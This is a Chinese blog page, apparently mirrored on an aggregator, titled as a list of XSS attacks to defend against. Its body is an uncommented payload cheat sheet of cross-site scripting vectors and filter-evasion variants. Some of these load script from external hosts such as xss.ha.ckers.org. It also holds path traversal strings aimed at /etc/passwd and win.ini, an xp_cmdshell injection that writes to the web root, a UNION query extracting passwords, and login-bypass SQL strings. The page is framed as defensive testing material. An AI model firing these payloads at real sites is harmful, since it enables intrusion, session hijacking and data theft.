zoukankan
html css js c++ java
需要防范的XSS攻击
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
disruptor 高并发编程 简介demo
mysql 关于join的总结
Mysql查询结果导出为Excel的几种方法
初识ganglia
Mybatis概述
struts2中的拦截器
hessian在ssh项目中的配置
Hessian基础入门案例
activiti工作流框架简介
Oracle中的优化问题
原文地址:https://www.cnblogs.com/evlon/p/849543.html
最新文章
一致性hash算法
Kubernetes学习续之一键部署kubeadm
Kubernetes学习
docker swarm
docker compose项目
洗牌算法
盒子模型、IFC、BFC和Collapsing margins
跟着9张思维导图学习Javascript
理解restful
ajax如何实现、readyState五中状态的含义
热门文章
【前端性能】浅谈域名发散与域名收敛
前端优化策略
web安全
能否使用require('.json')的方式加载大量JSON文件?
R中apply函数族
tomcat 6 利用ExpiresFilter控制静态文件缓存
编译hadoop2.6.0 cdh 5.4.5 集成snappy压缩
Spring 数据库连接池读取系统环境变量作为参数
R 基本函数总结
R 入门笔记
Copyright © 2011-2022 走看看